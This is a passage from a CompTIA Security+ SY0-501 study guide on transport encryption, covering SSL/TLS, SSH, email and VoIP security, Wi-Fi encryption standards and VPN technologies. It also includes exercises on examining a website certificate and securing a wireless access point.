even transmitted as plaintext. To securely communicate over the network, you either need to replace these
protocols with newer and more secure alternatives, or augment their security on other layers of the network.
You will learn:

Cryptography and the OSI model


When many of the underlying protocols of today's networks were developed, security wasn't a big concern,
especially cryptographic security. There were a few reasons for this. One was that attacks were fewer and less
sophisticated, another that cryptography was computationally expensive and legally regulated, and a third was
that network engineers were too busy making networks reliably function in the first place. A lot of the tools of
modern cryptography weren't even in place: the core protocols of TCP/IP and Ethernet were both designed
before the principles of public key cryptography and cryptographic hashing were even published, and while
the DES cipher was still being developed and standardized. So while some protocols used passwords for
authentication, they were transmitted as plaintext, and while checksums were used for data integrity, they
weren't cryptographically secure.
Today the demands for cryptographic security are both far higher, and there are common and widely available
tools to help guarantee confidentiality, integrity, and authenticity of data in transit. Secure protocols have been
designed that can replace insecure older ones, or at least protect their data. Unfortunately, networks have
evolved over time rather than been entirely replaced, so they still aren't designed for security from the ground
up. This means that increasing security while maintaining compatibility can be a real challenge, whether
you're introducing encryption in the first place or just switching to stronger methods.
Remember that the OSI model describes the network in terms of seven layers, each with its own set of roles
and the protocols needed to achieve them, and each encapsulating data used by protocols on higher layers.
Cryptographic security isn't tied to any particular layer; in theory you could apply it to any layer to protect
data on that level. You could even theoretically apply encryption at every layer, but compatibility concerns
aside that approach could greatly damage performance. In practice, networks more commonly apply
cryptographic protections where attack is most likely: to authentication processes, to particular types of
traffic, or on certain segments of the physical network.
That doesn't mean you can get the same effect from encrypting on any given layer: each has its own benefits
and drawbacks both in terms of what is secured, and the potential effects on compatibility and performance.
For instance, encryption used on the upper layers of the network, like the HTTPS protocol used by secure
websites, will selectively protect traffic using that protocol. The encryption needs to be supported by the
application software on both ends of the connection, but not necessarily by the underlying operating system
functions or network hardware: to them, application data is application data. If you wanted to apply this sort
or protection to multiple applications on the network, you'd need a secure protocol for each one, and
application software that knows how to use it.
On the other side, imagine encryption used on a lower layer of the network, like the WPA encryption used by
Wi-Fi access points. WPA protects all traffic that passes through the Wi-Fi network, regardless of whether it's
using a secured application protocol or not, so an eavesdropper couldn't steal your plaintext FTP password by
listening to your wireless signal. It even obfuscates what higher level protocols you're using, so the
eavesdropper can't necessarily even tell it's FTP traffic in the first place. This might sound better, but it has its
own drawbacks. Lower level encryption might be easier to break for an inside attacker connected to the same
secure network, and it might apply to only part of the network besides: in the case of Wi-Fi, the AP is
probably connected to an unencrypted Ethernet network, and data that travels onto the wired portion won't be
protected. There's no technical reason you couldn't apply similar encryption to Ethernet or any other Layer 2
standard, but every router and switch that handles data on that layer would need to have compatible protocols,
suitable credentials, and sufficient processing power to handle its existing workload.

236 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module B: Transport encryption

There are a few other consequences to using cryptography on different network layers. Headers might need to
be left unencrypted so they can easily be read. Even integrity verification can be a problem with header fields
that might need to be changed in transit. Some networks might use traffic shapers or content filters that
operate by reading packet contents; if said contents are encrypted, traffic can be misdirected or even blocked,
even if a more "traditional" network wouldn't have been affected.

SSL and TLS


The most widespread standard for securing the upper layers of the network stack is Secure Sockets Layer
(SSL) along with its successor Transport Layer Security (TLS). Technically speaking, in the OSI model both
are classified as either Session (Layer 5) or Presentation (Layer 6) protocols, but their implementation often
extends up into the Application layer. The important thing is that they lie somewhere between application
protocols themselves and the Transport layer protocols used by the TCP/IP stack.

Exam Objective: CompTIA SY0-501 2.6.1.9


SSL was originally developed by Netscape as a way to add security beneath the HTTP protocol, and that's still
one of its most popular uses. SSL versions 1 and 2 contained serious security flaws and were quickly replaced
in 1996 by the final standard, SSL 3.0. While SSL 3.0 was eventually published as an IETF standard, today
it's considered cryptographically vulnerable and was officially deprecated in June 2015. SSL is still in
widespread use, but it's being replaced by TLS and shouldn't be used in new installations when possible.
In 1999 TLS 1.0 was introduced, with TLS 1.1 following in 2006 and 1.2 in 2008. It supports newer
encryption standards and fixes some other security issues. While the two aren't directly compatible, really
TLS can be seen as a further evolution of SSL: the name change was mostly to signify that it had become an
open standard rather than a proprietary Netscape project. As usual, users and even some documentation don't
care much about technicalities, so you'll still frequently see reference to "SSL" even on modern software that's
moved entirely to TLS, or you'll see the two used interchangeably. Inaccurate as it is, sometimes TLS 1.0 is
even called "SSL 3.1", or public key certificates are generically called "SSL certificates" even when they're
not used for SSL at all.
Both SSL and TLS use certificate based authentication to set up a key exchange between two parties, then use
symmetric encryption for the actual communications session. The encrypted session then continues until one
side or the other breaks the connection. At the minimum, one party needs to have a certificate to perform one-
way authentication; for example, when you connect to a SSL-secured website, the server's certificate allows
your browser to authenticate that the server is genuine, but if the server requires your identity you'll need a
password or some other authentication factor. SSL and TLS can also perform dual or two-way authentication,
where both the client and server must have a certificate to present to the other.

Cipher suites
Maintaining cryptographic security requires that all parties involved use compatible, and secure, algorithms.
Often a given protocol needs several at once. To establish a SSL session you need not only a public key cipher
for key exchange and a symmetric cipher for bulk encryption; you also need a hashing algorithm to validate
certificates and integrity checks, and a pseudorandom number generator to create session keys and nonces. A
given protocol could define exactly what algorithms to use, but that wouldn't be very flexible for different
users with different security needs, or easily keep up with the overall network's security needs changing over
time.
SSL and TLS allow flexibility by means of cipher suites, named combinations of supported algorithms for
each category, listed in order of preference. When two hosts establish a SSL connection, the client presents its
list of supported cipher suites, and the server chooses one of them.
A specific cipher suite consists of a complete combination of algorithms, and the server must use one cipher
suite as a whole rather than combining compatible algorithms from different suites. For example, if the
client's first choice of cipher suite and the server's use the same symmetric cipher, hash, and PRNG, but the
client wants to do key exchange using a Diffie-Hellman variant the server doesn't support, the server can't just
take the other algorithms and look for a better key exchange method in the client's list. Instead, it has to find a
cipher suite that entirely matches one of its own, even if all the other algorithms are different.

CompTIA Security+ Exam SY0-501 237


Chapter 5: Securing networks / Module B: Transport encryption

You can configure a host's list of cipher suites, and their order of preference. With the number of algorithms
of each category TLS allows there are hundreds of possible combinations, even if some are more likely than
others. To maximize security, you can certainly put especially strong combinations at the top of the list, but
for compatibility keep in mind what suites other hosts are likely to be using and include common, but
sufficiently secure, combinations. Even for sake of backward compatibility, including insecure suites opens
you to the possibility of downgrade attacks.

SSL applications
The most visible use of SSL/TLS, and in fact the most visible secure replacement for an older protocol in
general, is HTTP Secure (HTTPS), the standard used by secure websites. When you're using HTTPS, your
browser address bar starts with https:// instead of http://, and you'll see some sort of padlock icon or
green background showing that the site is secure and verified. The precise details depend on the browser
you're using and the type of certificate the site has. You can even click it for more info on the server
certificate.

Exam Objective: CompTIA SY0-501 2.6.1.6, 2.6.1.8, 2.6.1.10, 2.6.1.11, 2.6.2.3, 2.6.2.4

When there's a certificate problem with an HTTPS site, your browser will give some sort of warning. Usually
you'll first see a warning page, asking whether you want to continue. Even if you do, the address bar will
generally show some sort of error. At the least, this means the site isn't configured properly or has an outdated
certificate. It could also indicate further security problems, or even a fraudulent site.

For all that, HTTPS isn't really a new protocol; in fact, its syntax and functions are exactly like HTTP. The
difference is that the browser and server both pass HTTP traffic through SSL or TLS. For this reason, HTTPS
is also said to stand for HTTP over SSL, or HTTP over TLS. HTTPS traffic is kept separate from regular,
unencrypted HTTP traffic by using the different name, and also by using a different server port: 443 for
HTTPS vs. 80 for HTTP.
HTTPS is the first and most widespread use of SSL, but it's not the only one. In theory, SSL/TLS can perform
authentication and encryption for any application layer protocol, and pass it on to any transport layer protocol.
This has made it a popular way to add security to otherwise insecure application protocols. Sometimes they're
explicitly named, for example FTPS is the FTP protocol run over SSL or TLS. Other times they're just
configuration options in the applications using them; insecure email protocols like SMTP, POP, and IMAP can
be secured if both client and server support SSL/TLS. Even when the naming isn't different, a server that
accepts both secure and insecure connections will commonly use different server ports for the two.

238 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module B: Transport encryption

Since it's so popular and well-proven, sometimes SSL/TLS is even used as an alternative method for protocols
that have existing security measures, such as a way to add certificate-based authentication. While version 3 of
Simple Network Management Protocol (SNMP) includes encryption on its own, some variants use TLS.
Likewise, EAP-TLS applies TLS to the Extensible Authentication Protocol widely used in point-to-point and
wireless connections. SSL/TLS are even the foundation for some modern fully-featured VPN technologies.

SSL appliances
By and large SSL/TLS isn't very strenuous for modern computers, even using strong encryption. In fact, many
newer processors have support for AES acceleration functions so the symmetrical encryption has minimal
performance impact, and the most computationally expensive part is the initial key exchange. That said, there
are times when additional hardware devices or appliances are still desirable.

Exam Objective: CompTIA SY0-501 2.1.14, 2.1.15, 3.2.4.8


First, just because SSL has a low performance impact doesn't mean it has none. For high-volume servers it's
still beneficial to add SSL/TLS accelerators or more general hardware security modules in the form of add-on
cards or separate network devices. Offloading encryption/decryption to the specialized device takes stress off
the web or application server.
Second, sometimes you don't want to use encryption within a trusted network. The same features that make
SSL a powerful protection for private communications on untrusted networks make it possible for attackers
within a trusted network to spread malware or exfiltrate data without being noticed. It can even make it hard
to monitor and shape ordinary traffic for performance purposes. A solution to this problem is SSL decryptors
placed on network boundaries or other critical locations, which can open and inspect SSL/TLS traffic. Some
of these appliances are built into proxy servers, and others into firewalls. Either way, they function as a sort of
legitimate man-in-the-middle attack, serving as the local endpoint of the SSL connection. On the trusted
network, they may also set up a separate SSL connection with the internal host to prevent eavesdropping by
inside attackers.

SSL decryptors do have some technical, ethical, and legal issues. Technically speaking, it's important that the
proxy's own SSL certificate is registered on internal clients. Otherwise, they'll receive invalid certificate
warnings from outside sites. Ethically and legally, if your network policies allow personal internet access such
as private email or online banking, it's essential that your privacy policy spells out just what communications
can be intercepted and how they can expect that information to be protected.

Secure shell
Secure shell (SSH) has some similarities to SSL in name, purpose, and underlying technologies, but the two
are very distinct in origin, application, and other specifics. Like SSL, SSH was first used to apply security to
common protocols; originally, it was intended to replace telnet, rlogin, and other remote terminal applications
with weak authentication and no encryption. It also includes secure copy protocol (SCP), rsync, and SSH File
Transfer Protocol (SFTP) as replacements of older file transfer protocols. These protocols aren't just existing
protocols run through SSH tunnels—instead, they're designed from the ground up to replace the functionality
of those older protocols from within SSH. SSH uses TCP port 22.

CompTIA Security+ Exam SY0-501 239


Chapter 5: Securing networks / Module B: Transport encryption

Exam Objective: CompTIA SY0-501 2.6.1.2, 2.6.1.7

Note: SFTP specifically replaces FTP, but it shouldn't be confused with FTPS running over TLS. It's an
easy mistake to make since they have similar names, similar functions, and are sometimes both
supported by the same client applications.
SSH uses public key cryptography to authenticate connections. Some implementations rely on X.509
certificates verified through CAs, but unlike SSL other methods are readily supported. The original, and still-
supported, SSH authentication method relies on users to manually verify each other through an out-of-band
key exchange before creating a client-server connection for the first time.
In addition to its core application protocols SSH can also be used as a tunneling protocol to carry a wide
variety of application data, or even create a VPN. It's primarily used to connect to Unix-like servers in
particular, but it's available for Windows systems as well.

Secured email
Securing and authenticating email is historically difficult, which is much of why it's traditionally seen as an
informal communication method. Security has greatly increased on modern systems, with improved server
authentication and SSL/TLS secured connections, but there are still vulnerabilities and not all systems support
strong security. In addition, those methods only really secure mail as it travels between client and server: the
email messages themselves are still just plaintext. This means an attacker can read or alter messages stored on
a compromised server, or transmitted insecurely between servers over the internet.

Exam Objective: CompTIA SY0-501 2.6.1.3


An alternative is to encrypt or digitally sign the contents of the email itself. As long as the sender and
recipient's clients both support the method used and the ciphertext is compatible with standard email
protocols, it doesn't matter what security measure are used in transit.
There are two main standards for securing email messages:

S/MIME Secure/Multipurpose Internet Mail Extensions adds public key encryption and signing to the
MIME format used by most email messages. S/MIME uses X.509 certificates distributed by a CA;
it's common to use separate private keys (and thus separate certificates) for encryption and
signing, so that the encryption key can be held in escrow without compromising the non-
repudiation ability of the signing key. Most modern clients support S/MIME, but since it requires
purchase and installation of certificates from a CA it's mostly used in enterprise environments with
high security needs.
PGP Pretty Good Privacy was developed by Phil Zimmermann in 1991 and was the first public-key
cryptography program available to the general public. In fact, at the time it led to a criminal
investigation of Zimmermann for breaking the very restrictive rules the US government had at the
time regarding strong encryption. PGP was originally designed for use on bulletin board services,
but was easily adapted to email and other applications. Since OpenPGP certificates use web of
trust model, anyone can create them freely; as a result, PGP is the more popular choice for
encrypting email outside of enterprise environments,
Note: The original PGP software was freeware; today PGP itself is commercial
software owned by Symantec, but technically it uses the OpenPGP standard
supported by many vendors. GNU Privacy Guard is a popular free replacement.

Secure VoIP
While VoIP-enabled PBX systems are extremely convenient, putting phone traffic on IP networks can make
attacking telephone systems easier than it has been since the 1970s era of phreaking with a line tap and tone
generator. A big part of this is that two of the most important protocols used for VoIP are insecure: Session
Initiation Protocol (SIP), which is used for establishing, managing, and ending communication sessions; and

240 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module B: Transport encryption

Real-time Transfer Protocol (RTP), which is used to carry audio or video data itself. With no security features,
it's simple for an attacker to manipulate communication sessions or listen in on sensitive calls.

Exam Objective: CompTIA SY0-501 2.6.1.4, 2.6.2.1


To secure VoIP, you can use encryption extensions to insecure protocols.
 SIP can be secured using TLS. Since two-way authentication is important for a secure call, both client
and server must have certificates.
 RTP can be used with a security profile called Secure RTP (SRTP), which allows both AES encryption
and HMAC-SHA1 authentication.

Exercise: Examining website certificates


In this exercise, you'll view a SSL certificate in your web browser.
Do This How & Why

1. In the Windows 7 VM, open Firefox.

2. Navigate to www.google.com. Google automatically loads its page as HTTPS. The green
padlock shows that it's a verified certificate and the connection
is encrypted.

3. Examine the certificate on the page. You'll learn more about how the certificate was issued and
what protection it provides.

a) Point to the padlock icon. A tooltip appears saying that it's verified by Google, Inc.

b) Click the icon. A popup appears showing the certificate and site permissions.

CompTIA Security+ Exam SY0-501 241


Chapter 5: Securing networks / Module B: Transport encryption

Do This How & Why

c) Click the right arrow, then More The Page Info window opens with the Security tab active.
Information.

d) Examine the Website Identity It gives the website name and the CA that issued and verified
section. the certificate. In this case, it's verified by Google's own CA.

e) Examine the Technical Details It lists the protocols being used by the connection. In this case,
section. the connection is encrypted using TLS 1.2 as the transport
protocol, elliptic-curve Diffie-Hellman key exchange, RSA
key signing, AES-128 symmetric encryption, and SHA256
hashes. They're all strong cryptographic protocols.

f) Examine the Privacy & History It doesn't relate directly to the certificate, but does list whether
section. you have any cookies or saved passwords for this site.

4. View the certificate itself.

242 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module B: Transport encryption

Do This How & Why

a) Click View Certificate. The Certificate Viewer window appears.

b) Examine the General tab. It shows the valid uses for the certificate, who it was issued to,
who it was issued by, when it is valid, and its SHA1 and SHA-
26 hashes.

c) Click the Details tab. It has three sections: Certificate Hierarchy, Certificate Fields,
and Field Value. It also has an Export button to save the
certificate as a file.

d) In the Certificate Fields section, These are X.509 fields. As you click each, its value appears in
click each field in turn. the bottom section.

e) Examine the Certificate Hierarchy www.google.com's certificate was issued by the Google
section. Internet Authority G2 intermediate CA. In turn, it's certificate
was issued by the GeoTrust Global CA.

f) Click GeoTrust Global CA. Each level has its own certificate that you can fully examine.

5. Close all open windows.

CompTIA Security+ Exam SY0-501 243


Chapter 5: Securing networks / Module B: Transport encryption

Wireless encryption
In contrast to SSL and its relatives and alternatives, the other most visible use of encrypted connections is on
802.11 Wi-Fi networks. While many Ethernet networks have little internal security for anyone who can
physically plug in, in the world of Wi-Fi even novice users learn to enable secure hotspots with strong
encryption and lengthy passwords. The reason why isn't that hard to guess: the nature of wireless signals
makes it difficult to achieve the sort of physical access control and network segmentation Ethernet has almost
by default.
Cryptographic security on Wi-Fi networks is handled at Layer 2 (Data Link) in the OSI model, so it behaves
very differently than upper level encryption like SSL. Since it applies to the Layer 2 frames themselves it
encrypts all data that passes over the network, but it's local rather than end to end; any higher level data
passing to a wired network or a different hotspot will use the security settings (or lack thereof) for that
network. Note that while frame payloads themselves are encrypted, the Layer 2 header is not: this means that
all connected MAC addresses as well as the network's SSID are readable to an eavesdropper no matter how
the network is secured.
Similarly, Wi-Fi security is handled by the hardware, firmware, and drivers of the wireless adapters and
access points themselves rather than the operating system or a separate software application. The particular
security settings used by the access point must be supported by any device wishing to connect to the network,
and the available ciphers and security settings are a fairly narrow set defined by the 802.11 Wi-Fi standards.
In practice, both of these limitations have advantages: some WAP settings allow simultaneous support of a
number of client standards, and many Wi-Fi devices use hardware-accelerated encryption so even strong
ciphers on slow devices won't impact performance.

Wi-Fi encryption standards


The security standards used for Wi-Fi make a good example of how security needs change over time, and how
seriously flawed encryption implementations can become widely adopted. In general, there are three available
encryption standards on modern Wi-Fi networks, though each has some internal options.

Exam Objective: CompTIA SY0-501.6.3.1

WEP Wired Equivalent Privacy was part of the original Wi-Fi standard. It uses the RC4 stream cipher,
and it soon turned out to have some major problems. First, due to export restrictions of the time its
default configuration was a 64-bit key: 24 bits of IV, 40 bits of actual encryption. Even at the time
this wasn't very strong. The stronger WEP-128 option gave an effective 104 bits of work factor in
theory, but weaknesses with the IV and other aspects of the protocol made it nearly as easy to
break. A skillful attack can compromise either variety of WEP in seconds, so while current devices
might still support it for compatibility reasons, it was removed from the Wi-Fi standard in 2004
and is never recommended for use.
WPA Wi-Fi Protected Access was included as part of the draft 802.11i standard, rushed a bit into service
when WEP's critical limitations became obvious. It was designed to run on the same hardware as
WEP, but with enhanced security. While most WPA devices support AES encryption, by default,
WPA encrypts traffic using Temporal Key Integrity Protocol (TKIP), a different implementation of
the RC4 cipher. Not only is the encryption key itself 128 bits, but it uses a different and more
secure initialization vector along with a 64-bit MIC, and each data packet is sent using its own key.
This protected it from the worst of the WEP attacks, but it still has some vulnerabilities. In practice,
WPA with TKIP isn't actually considered broken like WEP is, but it's vulnerable enough that AES
mode is preferred.

244 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module B: Transport encryption

WPA2 WPA2 is the final version of WPA, based on the final 802.11i standard. It has a few changes, but
the biggest one is mandatory support for 128-bit AES-CCMP, the AES cipher using the Counter
Mode Cipher Block Chaining mode of operation. AES was optional in many WPA devices, but not
required. Likewise, WPA2 devices usually allow TKIP as an option. Since there are no known
effective attacks against AES itself, WPA2 in AES-only mode is the strongest current encryption
standard for Wi-Fi.

WPA authentication
WPA and WPA2 offer three methods for authentication and key distribution.

Exam Objective: CompTIA SY0-501 6.3.3.1, 6.3.3.2

WPA-Personal Also called pre-shared key (PSK). Uses a 256-bit key manually distributed to each
authorized user. The key can be directly entered as 64 hexadecimal digits, or in the form
of an ASCII password between 8 and 63 characters. If the ASCII password is used, it's
hashed using the SSID as a salt in order to create the key itself. WPA-Personal is
convenient for small networks with few users, and if the password is long and random
enough and the SSID unusual it's as secure as any method. The downside is that all users
use the same key: this not only means that the key needs changed if any one user is
compromised, but the new key also needs manually passed on to each user.
WPA-Enterprise Also known as 802.1x mode. Connecting clients are allowed to communicate only to an
external authentication server using EAP; by default EAP-TLS is used but a number of
other standards are supported, such as PEAP, EAP-TTLS, or various proprietary
protocols. Once clients are authenticated, they get full network access, but they never
directly see the WPA encryption key so they can't share it. WPA-Enterprise is more work
to set up, but since individual user credentials can be changed or removed, it's easier to
maintain and keep secure.
WPS Wi-Fi Protected Setup was designed to make it easy for non-technical users of home
networks to easily control network access. It's an addition to PSK mode, but also allows
the key to be shared with a new device by other methods like a PIN, a push-button
pairing mechanism, or NFC pairing. It's convenient, but it turned out to have a major
security flaw. The PIN method, which is a mandatory part of the standard, turned out to
be unexpectedly susceptible to brute force cracking; an attacker can solve any PIN in a
matter of hours. While this might keep out casual freeloaders, that's no time at all for a
determined intruder, so WPS is not recommended for real security.

By default, WEP uses a pre-shared passkey for authentication. While it's not a part of the Wi-Fi standard,
WEP devices from Cisco and some other vendors support an authentication system using Lightweight
Extensible Access Protocol (LEAP). In addition to adding individual credentials and mutual authentication,
LEAP enables dynamic encryption keys for WEP itself. While it still has some vulnerabilities, and its overall
security is inferior to WPA-Enterprise, LEAP is at least much more secure than WEP itself. A more secure
replacement for LEAP, EAP-FAST, fixes most of LEAP's vulnerabilities while remaining easier to configure
than PEAP or other EAP variants.

CompTIA Security+ Exam SY0-501 245


Chapter 5: Securing networks / Module B: Transport encryption

Exercise: Securing a WAP


Since this exercise uses a public web site, you can use it from any browser. However, it's possible the site may
move or change. If the site is no longer available at the time you're taking this class, use a real WAP or a
different emulator.
This exercise uses an online emulator of a common wireless access point interface. You can use a different
emulator, or a real WAP, and it will probably have the same available settings. Every manufacturer, model,
and firmware revision has interface differences, however, so the exact steps will differ.
Do This How & Why

1. In your web browser, navigate to http://ui.linksys.com/WRT320N/1.0.00/


Like most WAPs, this model uses a simple web-based interface. By default, it opens to a page that
allows you to set up its WAN connection and DHCP server, but right now you're just going to
configure it as a WAP.

2. Configure basic wireless settings.

a) On the navigation bar, click By default it uses an automatic WPS configuration with
Wireless. default settings, but it's not secure so you'll configure it
manually.

b) Click Manual. By default, the router is using the 2.4 GHz wireless band.
Switching to 5 GHz would reduce interference sources, but
also reduce maximum range.

c) From the Network Mode list, select All devices on your network should support 802.11n, so you'll
Wireless-N Only. disable older modes which might cause performance or
security issues.

d) In the Wireless Network Name box, Try to choose something unique. Keeping the default SSID, or
type a unique name. even just a common one, makes you more vulnerable to
rainbow attacks.

e) Next to SSID Broadcast, check You'd rather not advertise your network to anyone browsing,
Disable. but anyone who knows the name can still easily connect.

3. Configure security settings. By default, no security is enabled. You generally want to use
the strongest encryption compatible with all clients.

246 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module B: Transport encryption

Do This How & Why

a) In the second row of the navigation Don't click "Security" in the main navigation bar.
bar, click Wireless Security.

WEP is an old and weak security standard, while the others


can all be effective if properly configured. Both WPA and
WPA2 are more secure. In this menu, "RADIUS" itself means
WEP with a RADIUS server for extra security.

b) Select Enable WPA2 Enterprise WPA2 is a bit stronger than WPA. Enterprise mode means it
uses a RADIUS server for 802.1X authentication, rather than a
shared passphrase on the WAP. A new section appears with
WPA2 settings.

c) From the Encryption list, choose TKIP is less secure.


AES.

d) Set RADIUS Server to You configured this RADIUS server in Windows Server 2012
10.10.10.2 and RADIUS Port earlier.
to 1812.

e) In the Shared Secret field, type You'd put a real password here.
P@ssw0rd.

4. At the bottom of the page, observe the On a real AP, the settings wouldn't be applied until you saved
Save Settings button. them.

5. On the second row of the navigation You can access more advanced transmission and access control
bar, click Advanced. features from this page. AP Isolation can be used to prevent
wireless clients from directly communicating, enhancing
security.

CompTIA Security+ Exam SY0-501 247


Chapter 5: Securing networks / Module B: Transport encryption

Do This How & Why

6. Click Wireless MAC filter. You can create a MAC whitelist or blacklist to restrict access
to the WAP. Like hiding the SSID, this doesn't give real
security, but it's helpful on top of strong authentication.

7. Close your web browser.

Wireless settings at the end of the exercise

Virtual private networks


Traditionally, if you wanted to securely create remote access to a LAN, or join two widely separate LANs,
you had to use a point-to-point WAN connection. Circuit-based connections give some level of privacy across
untrusted networks, and PPP can carry just about any protocol or service the LAN can. This worked pretty
well when individual users had modems and businesses had leased lines or the like, but in modern situations
when it's faster and cheaper to just have broadband internet access, the old way is expensive and inefficient.
On the other hand, direct internet communications aren't very secure.

Exam Objective: CompTIA SY0-501 2.1.2.1, 3.2.3, 3.2.4.7


Today, virtual private networks (VPNs) allow secure communication across the internet, effectively making a
virtual point-to-point connection. This connection can allow authentication and encryption not normally used
on the internet. It can also support tunneling to transmit non-routable or non TCP/IP protocols across the
internet. In fact, it doesn't even have to be the internet: you can use a VPN to log into a secured LAN from
across the larger enterprise network, or to secure all traffic to or from computers on an open wireless network.
VPNs can be classified according to their topology, or according to the protocols used. The topology
classification is simplest, since it exactly mirrors the ways you can use a traditional PPP connection.

248 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module B: Transport encryption

 Host-to-host
 Host-to-site, or remote access
 Site-to-site

Each end of the virtual PPP connection needs a means to actually perform VPN functions. On a host end this
is commonly an ordinary software service or application. On a site end a client application might be built into
a router's functions, or it could be a specialized hardware device called a VPN concentrator. A site-to-site
VPN in particular is completely transparent to the hosts actually using it, since all the VPN functions are
handled by a router or concentrator, but it can secure all traffic sent over the link.

VPN components
VPNs serve two different functions: enhancing security across public networks, and allowing LAN traffic to
transparently be carried across a public network with different protocols or addressing. Past that, both
functions can be broken down into multiple components and scenarios, and every VPN is going to have
different requirements for each goal.
To achieve these goals, VPN protocols incorporate a combination of three technologies.

 Authentication
 Tunneling
 Encryption

Not all VPNs actually need encryption: a trusted delivery network relying on the WAN provider's security
measures might consider it optional. Additionally, several VPN functions can be achieved with protocols not
unique to or even chiefly associated with VPNs. In particular, RADIUS, TACACS+ and RRAS all can
provide AAA for incoming VPN connections just like they do with dial-in users.

CompTIA Security+ Exam SY0-501 249


Chapter 5: Securing networks / Module B: Transport encryption

Tunneling methods
VPNs can be categorized by just what network communications are sent through the tunnel.

Exam Objective: CompTIA SY0-501 2.1.2.3


Traditional VPN connections are what is called a full tunnel connection. When you connect to the VPN, all
your network traffic is routed through the VPN tunnel, regardless of where it's actually going. If you use a full
tunnel for remote access to your workplace, all your network requests are sent to your work network, just like
if you were physically connected there only protected by the VPN tunnel. This is very secure, and it's ideal for
when you want to securely access resources on your work network, but it has potential drawbacks when you
want to access internet resources. Most importantly, it means that all of your "outside" network connections
increase the load on the VPN whether they need to be secured or not. If you're playing streaming video while
syncing your company email over the VPN, the VPN concentrator at your workplace has to connect to the
streaming server itself, download the video, and send it through the tunnel. This doesn't just cause a needless
network load for your workplace, but it might introduce bottlenecks and high latency from your perspective.

One solution to this is a split tunnel VPN, which only tunnels traffic addressed to specific destination ranges.
Like a router, the VPN reads the destination of each packet and decides whether it should be sent through the
tunnel, or over the open internet connection. A typical split tunnel connection to a workplace might tunnel
only communications with addresses on the company intranet, while all other traffic goes directly to the
internet. Split tunnels are more efficient, but they're not compatible with all clients or network configurations.
Additionally, they're not helpful if you want to protect all traffic, for example to safely use an unencrypted
Wi-Fi network.

Some tunneling solutions are actually intended to only work for a single port or connection. Usually such a
configuration won't be called a "VPN", but it might be especially when used for similar purposes such as to
access a LAN-only resource over the internet. Much like a split tunnel, this minimizes any negative impacts
of the VPN, but also reduces its functionality.

250 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module B: Transport encryption

Always-on VPNs
Traditionally VPNs are used by remote workers to connect to intranet resources, but it's become increasingly
popular to use VPN technologies to protect all network traffic on untrusted networks both to secure
communications and to protect the device itself from internet threats. A new technology in VPN clients is the
always-on VPN, which automatically detects whenever the device is connecting to an untrusted network and
establishes a VPN connection. If it cannot connect to the VPN, it will display a warning and may block some
or all traffic on the open network.

Exam Objective: CompTIA SY0-501 2.1.2.4


Always-on VPNs are useful for higher security environments and mobile devices, since they can reduce the
possibility of user error in connecting to unsecured networks. They are frequently paired with strict device
policies preventing users from disabling the VPN, and NAC policies including posture assessments and
quarantines.

Discussion: VPNs
1. When might you want to configure a site-to-site VPN?
Answers may vary, but it will usually involve joining two private LANs across a non-trusted network:
either a larger non-secured LAN or a WAN.
2. When might you want a full-tunnel VPN connection even if it hurts network performance?
One example is when you're on a Wi-Fi network you don't totally trust and want to make sure no one
eavesdrops on or attacks your internet communications.

VPN technologies
There are a number of protocols that can be used to form the core of a VPN solution.

Exam Objective: CompTIA SY0-501 2.1.2.4

GRE Generic Routing Encapsulation encapsulates almost any L3 protocol in a virtual point-to-point
link. It's used for tunneling, but has no other VPN functions on its own; consequently, it's a
common component in other VPN protocols.
PPTP Point-to-Point Tunneling Protocol is a very basic VPN protocol developed by a vendor
consortium including Microsoft, 3Com, and others. It encapsulates PPP packets over GRE to
provide VPN tunneling features, allowing it to carry any protocol PPP can including IP, IPX,
and NetBEUI. On its own, PPTP doesn't specify encryption or authentication methods, but
rather relies on the vendor implementation to include those. Since it's a low level protocol it
can be seamlessly applied to all sorts of network traffic, but its control functions require TCP
port 1723 and GRE port 47 to be open on the firewall. The most common PPTP
implementation is Microsoft's, which has been included in their operating systems since
Windows 95. It supports PAP, CHAP, and MS-CHAP authentication, and Microsoft Point-to-
Point Encryption (MPPE). Unfortunately, none of those methods provide very strong security,
and more secure PPTP implementations aren't widely supported.

CompTIA Security+ Exam SY0-501 251


Chapter 5: Securing networks / Module B: Transport encryption

L2TP/IPsec Layer 2 Tunneling Protocol is an IETF standard based on elements of PPTP and Cisco's similar
Layer 2 Forwarding protocol (L2F). Like PPTP it doesn't include encryption or authentication,
but it's less limited in what protocols it uses for those functions, and unlike PPTP it even
encrypts link negotiations. Most commonly L2TP uses RADIUS or TACACS+ authentication,
and Internet Protocol Security (IPsec) encryption. That particular combination is called
L2TP/IPsec, and is natively supported by most modern operating systems. When implemented
correctly it can be very secure, but it uses a double encapsulation method that can hurt
performance. A L2TP/IPSec VPN requires UDP ports 500 and 1701; if NAT traversal is
required, it also needs UDP port 4500 to be open.
SSL/TLS The same SSL/TLS protocols widely used in secure web servers can be used for tunneling,
strong encryption, and certificate-based authentication. Since they're high level protocols,
earlier and simpler SSL VPNs were fairly application-limited, but had the advantage of using a
web browser rather than a separate client application. Newer implementations can tunnel the
entire IP stack; while this approach doesn't fit neatly within OSI terminology, it can provide a
robust and secure alternative to traditional L2TP/IPsec VPNs, often even with higher
performance. SSL/TLS VPNs are available from many vendors, but their capabilities vary.
Common examples include the open source OpenVPN, and Microsoft's Secure Socket
Tunneling Protocol (SSTP). One benefit of SSL/TLS VPNs is that they often only need TCP
port 443 to be opened, just like an HTTPS server. They also can limit access to the network,
restricting the damage done by a compromised client.
SSH Secure Shell has encryption, authentication, and tunneling features, so can be used as a sort of
VPN. "A sort" is a good way to put it: it wasn't really meant for the purpose, and usually it's
used for tunneling a single application at a time or for port forwarding. It's still useful in
specific situations, and can provide fairly strong security. SSH itself operates on TCP port 22,
but when used as a VPN it often opens other ports for particular applications.

IPsec
IPsec is most associated with VPNs, but it can provide end-to-end L3 security on any IP network. It was
originally developed as a core protocol for IPv6, but was adapted for IPv4 use and is available in most IPv4
implementations. Like VPNs it can be used to protect traffic host-to-host, host-to-network, or network-to-
network; the difference is simply whether each end of the VPN is run by a router or a single host. Since it
